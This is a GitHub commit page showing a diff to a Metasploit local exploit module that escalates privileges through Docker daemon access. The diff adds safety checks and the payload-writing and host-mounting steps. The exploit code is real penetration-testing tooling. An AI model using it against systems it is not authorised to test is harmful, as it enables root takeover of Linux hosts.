Permalink
Browse files

Land #11239, Add check for writable and nosuid WritableDir

  • Loading branch information...
wchen-r7 committed Feb 9, 2019
2 parents e82dc95 + fe6956d commit a380bb6df12390c8fb07629c455a7b7f4a23032d
Showing with 31 additions and 2 deletions.
  1. +31 −2 modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

@@ -29,12 +31,18 @@ def initialize(info={})
}
))
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
])
end

def base_dir
datastore['WritableDir'].to_s
end

def check
if cmd_exec('docker ps && echo true') =~ /true$/
print_good("Docker daemon is accessible.")
Exploit::CheckCode::Vulnerable
else
print_error("Failed to access Docker daemon.")
@@ -43,8 +51,29 @@ def check
end

def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end

unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end

pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
print_status("Writing payload executable to '#{exe_path}'")

write_file(exe_path, pl)
@@ -59,7 +88,7 @@ def exploit
end

def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")

%Q{

0 comments on commit a380bb6

Please sign in to comment.